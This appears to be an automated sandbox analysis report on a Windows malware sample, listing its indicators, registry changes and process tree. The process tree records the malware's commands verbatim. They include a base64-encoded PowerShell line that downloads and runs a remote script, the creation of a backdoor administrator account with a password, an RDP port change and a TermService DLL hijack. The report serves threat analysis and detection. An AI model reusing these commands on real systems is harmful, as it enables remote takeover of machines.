Analysis
-
max time kernel
48s -
max time network
113s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
11-06-2021 15:07
Static task
static1
Behavioral task
behavioral1
Sample
20f307c716a689f4afa3a76b7143db22.exe
Resource
win7v20210408
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
20f307c716a689f4afa3a76b7143db22.exe
Resource
win10v20210410
0 signatures
0 seconds
General
-
Target
20f307c716a689f4afa3a76b7143db22.exe
-
Size
6.0MB
-
MD5
20f307c716a689f4afa3a76b7143db22
-
SHA1
2fd6796fd158c93b14654240533511af6fec03e5
-
SHA256
3647e2dc4336b2eeb828371821c706a329dce645cb16f9c1c31c3faeae8f56dd
-
SHA512
0a8d1b2d0cbd3860df907eb692aa2d775f021822b4d856c051d84e8056a2c1cf893bab68f471b69db0615341dd2dfe78dfac1b79d2239217cfbdf71bfb84061b
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
flow pid Process 16 3440 powershell.exe 18 3440 powershell.exe 19 3440 powershell.exe 20 3440 powershell.exe 22 3440 powershell.exe 24 3440 powershell.exe 26 3440 powershell.exe 28 3440 powershell.exe 30 3440 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
resource yara_rule behavioral2/files/0x000500000001ab60-224.dat upx behavioral2/files/0x000400000001a50b-225.dat upx -
Loads dropped DLL 2 IoCs
pid Process 2760 Process not Found 2760 Process not Found -
Drops file in Program Files directory 4 IoCs
description ioc Process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
description ioc Process File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI648C.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_z5xlrcym.peu.psm1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI64DE.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_4qj4enqc.xjh.ps1 powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI64BC.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI64DD.tmp powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI64CC.tmp powershell.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\ef29a4ec885fa451 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,User Agent," powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1400 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 3352 reg.exe -
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 19 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 20 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 22 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 18 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 2900 powershell.exe 2900 powershell.exe 2900 powershell.exe 1432 powershell.exe 1432 powershell.exe 1432 powershell.exe 3612 powershell.exe 3612 powershell.exe 3612 powershell.exe 4072 powershell.exe 4072 powershell.exe 4072 powershell.exe 2900 powershell.exe 2900 powershell.exe 2900 powershell.exe 3440 powershell.exe 3440 powershell.exe 3440 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 612 Process not Found 612 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2900 powershell.exe Token: SeDebugPrivilege 1432 powershell.exe Token: SeIncreaseQuotaPrivilege 1432 powershell.exe Token: SeSecurityPrivilege 1432 powershell.exe Token: SeTakeOwnershipPrivilege 1432 powershell.exe Token: SeLoadDriverPrivilege 1432 powershell.exe Token: SeSystemProfilePrivilege 1432 powershell.exe Token: SeSystemtimePrivilege 1432 powershell.exe Token: SeProfSingleProcessPrivilege 1432 powershell.exe Token: SeIncBasePriorityPrivilege 1432 powershell.exe Token: SeCreatePagefilePrivilege 1432 powershell.exe Token: SeBackupPrivilege 1432 powershell.exe Token: SeRestorePrivilege 1432 powershell.exe Token: SeShutdownPrivilege 1432 powershell.exe Token: SeDebugPrivilege 1432 powershell.exe Token: SeSystemEnvironmentPrivilege 1432 powershell.exe Token: SeRemoteShutdownPrivilege 1432 powershell.exe Token: SeUndockPrivilege 1432 powershell.exe Token: SeManageVolumePrivilege 1432 powershell.exe Token: 33 1432 powershell.exe Token: 34 1432 powershell.exe Token: 35 1432 powershell.exe Token: 36 1432 powershell.exe Token: SeDebugPrivilege 3612 powershell.exe Token: SeIncreaseQuotaPrivilege 3612 powershell.exe Token: SeSecurityPrivilege 3612 powershell.exe Token: SeTakeOwnershipPrivilege 3612 powershell.exe Token: SeLoadDriverPrivilege 3612 powershell.exe Token: SeSystemProfilePrivilege 3612 powershell.exe Token: SeSystemtimePrivilege 3612 powershell.exe Token: SeProfSingleProcessPrivilege 3612 powershell.exe Token: SeIncBasePriorityPrivilege 3612 powershell.exe Token: SeCreatePagefilePrivilege 3612 powershell.exe Token: SeBackupPrivilege 3612 powershell.exe Token: SeRestorePrivilege 3612 powershell.exe Token: SeShutdownPrivilege 3612 powershell.exe Token: SeDebugPrivilege 3612 powershell.exe Token: SeSystemEnvironmentPrivilege 3612 powershell.exe Token: SeRemoteShutdownPrivilege 3612 powershell.exe Token: SeUndockPrivilege 3612 powershell.exe Token: SeManageVolumePrivilege 3612 powershell.exe Token: 33 3612 powershell.exe Token: 34 3612 powershell.exe Token: 35 3612 powershell.exe Token: 36 3612 powershell.exe Token: SeDebugPrivilege 4072 powershell.exe Token: SeIncreaseQuotaPrivilege 4072 powershell.exe Token: SeSecurityPrivilege 4072 powershell.exe Token: SeTakeOwnershipPrivilege 4072 powershell.exe Token: SeLoadDriverPrivilege 4072 powershell.exe Token: SeSystemProfilePrivilege 4072 powershell.exe Token: SeSystemtimePrivilege 4072 powershell.exe Token: SeProfSingleProcessPrivilege 4072 powershell.exe Token: SeIncBasePriorityPrivilege 4072 powershell.exe Token: SeCreatePagefilePrivilege 4072 powershell.exe Token: SeBackupPrivilege 4072 powershell.exe Token: SeRestorePrivilege 4072 powershell.exe Token: SeShutdownPrivilege 4072 powershell.exe Token: SeDebugPrivilege 4072 powershell.exe Token: SeSystemEnvironmentPrivilege 4072 powershell.exe Token: SeRemoteShutdownPrivilege 4072 powershell.exe Token: SeUndockPrivilege 4072 powershell.exe Token: SeManageVolumePrivilege 4072 powershell.exe Token: 33 4072 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3896 wrote to memory of 2900 3896 20f307c716a689f4afa3a76b7143db22.exe 76 PID 3896 wrote to memory of 2900 3896 20f307c716a689f4afa3a76b7143db22.exe 76 PID 2900 wrote to memory of 3180 2900 powershell.exe 78 PID 2900 wrote to memory of 3180 2900 powershell.exe 78 PID 3180 wrote to memory of 3976 3180 csc.exe 79 PID 3180 wrote to memory of 3976 3180 csc.exe 79 PID 2900 wrote to memory of 1432 2900 powershell.exe 81 PID 2900 wrote to memory of 1432 2900 powershell.exe 81 PID 2900 wrote to memory of 3612 2900 powershell.exe 85 PID 2900 wrote to memory of 3612 2900 powershell.exe 85 PID 2900 wrote to memory of 4072 2900 powershell.exe 87 PID 2900 wrote to memory of 4072 2900 powershell.exe 87 PID 2900 wrote to memory of 2500 2900 powershell.exe 90 PID 2900 wrote to memory of 2500 2900 powershell.exe 90 PID 2900 wrote to memory of 3352 2900 powershell.exe 91 PID 2900 wrote to memory of 3352 2900 powershell.exe 91 PID 2900 wrote to memory of 1820 2900 powershell.exe 92 PID 2900 wrote to memory of 1820 2900 powershell.exe 92 PID 2900 wrote to memory of 2720 2900 powershell.exe 93 PID 2900 wrote to memory of 2720 2900 powershell.exe 93 PID 2720 wrote to memory of 3252 2720 net.exe 94 PID 2720 wrote to memory of 3252 2720 net.exe 94 PID 2900 wrote to memory of 4080 2900 powershell.exe 95 PID 2900 wrote to memory of 4080 2900 powershell.exe 95 PID 4080 wrote to memory of 2748 4080 cmd.exe 96 PID 4080 wrote to memory of 2748 4080 cmd.exe 96 PID 2748 wrote to memory of 4000 2748 cmd.exe 97 PID 2748 wrote to memory of 4000 2748 cmd.exe 97 PID 4000 wrote to memory of 3600 4000 net.exe 98 PID 4000 wrote to memory of 3600 4000 net.exe 98 PID 2900 wrote to memory of 1432 2900 powershell.exe 99 PID 2900 wrote to memory of 1432 2900 powershell.exe 99 PID 1432 wrote to memory of 716 1432 cmd.exe 100 PID 1432 wrote to memory of 716 1432 cmd.exe 100 PID 716 wrote to memory of 1900 716 cmd.exe 101 PID 716 wrote to memory of 1900 716 cmd.exe 101 PID 1900 wrote to memory of 780 1900 net.exe 102 PID 1900 wrote to memory of 780 1900 net.exe 102 PID 2144 wrote to memory of 3352 2144 cmd.exe 106 PID 2144 wrote to memory of 3352 2144 cmd.exe 106 PID 3352 wrote to memory of 2732 3352 net.exe 107 PID 3352 wrote to memory of 2732 3352 net.exe 107 PID 580 wrote to memory of 3704 580 cmd.exe 110 PID 580 wrote to memory of 3704 580 cmd.exe 110 PID 3704 wrote to memory of 1612 3704 net.exe 111 PID 3704 wrote to memory of 1612 3704 net.exe 111 PID 4080 wrote to memory of 3180 4080 cmd.exe 114 PID 4080 wrote to memory of 3180 4080 cmd.exe 114 PID 3180 wrote to memory of 1820 3180 net.exe 115 PID 3180 wrote to memory of 1820 3180 net.exe 115 PID 2116 wrote to memory of 1120 2116 cmd.exe 118 PID 2116 wrote to memory of 1120 2116 cmd.exe 118 PID 1120 wrote to memory of 1904 1120 net.exe 119 PID 1120 wrote to memory of 1904 1120 net.exe 119 PID 3904 wrote to memory of 3440 3904 cmd.exe 122 PID 3904 wrote to memory of 3440 3904 cmd.exe 122 PID 3440 wrote to memory of 1072 3440 net.exe 123 PID 3440 wrote to memory of 1072 3440 net.exe 123 PID 2752 wrote to memory of 1472 2752 cmd.exe 126 PID 2752 wrote to memory of 1472 2752 cmd.exe 126 PID 1472 wrote to memory of 2748 1472 net.exe 127 PID 1472 wrote to memory of 2748 1472 net.exe 127 PID 1904 wrote to memory of 4012 1904 cmd.exe 130 PID 1904 wrote to memory of 4012 1904 cmd.exe 130
Processes
-
C:\Users\Admin\AppData\Local\Temp\20f307c716a689f4afa3a76b7143db22.exe"C:\Users\Admin\AppData\Local\Temp\20f307c716a689f4afa3a76b7143db22.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3896 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2900 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qc1klqpt\qc1klqpt.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:3180 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2BE8.tmp" "c:\Users\Admin\AppData\Local\Temp\qc1klqpt\CSC181D763AEC2E4430B3911E3EB82E42B0.TMP"4⤵PID:3976
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1432
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3612
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4072
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:2500
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:3352
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:1820
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:2720 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:3252
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:4080 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:2748 -
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:4000 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:3600
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
PID:1432 -
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:716 -
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:1900 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:780
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:1556
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:3976
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Ghar4f5 /del1⤵
- Suspicious use of WriteProcessMemory
PID:2144 -
C:\Windows\system32\net.exenet.exe user wgautilacc Ghar4f5 /del2⤵
- Suspicious use of WriteProcessMemory
PID:3352 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Ghar4f5 /del3⤵PID:2732
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc GaRyvMGs /add1⤵
- Suspicious use of WriteProcessMemory
PID:580 -
C:\Windows\system32\net.exenet.exe user wgautilacc GaRyvMGs /add2⤵
- Suspicious use of WriteProcessMemory
PID:3704 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc GaRyvMGs /add3⤵PID:1612
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:4080 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:3180 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD3⤵PID:1820
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:2116 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:1120 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD3⤵PID:1904
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:3904 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:3440 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD3⤵PID:1072
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc GaRyvMGs1⤵
- Suspicious use of WriteProcessMemory
PID:2752 -
C:\Windows\system32\net.exenet.exe user wgautilacc GaRyvMGs2⤵
- Suspicious use of WriteProcessMemory
PID:1472 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc GaRyvMGs3⤵PID:2748
-
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
- Suspicious use of WriteProcessMemory
PID:1904 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
PID:4012
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:1612
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵PID:1036
-
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:3908
-
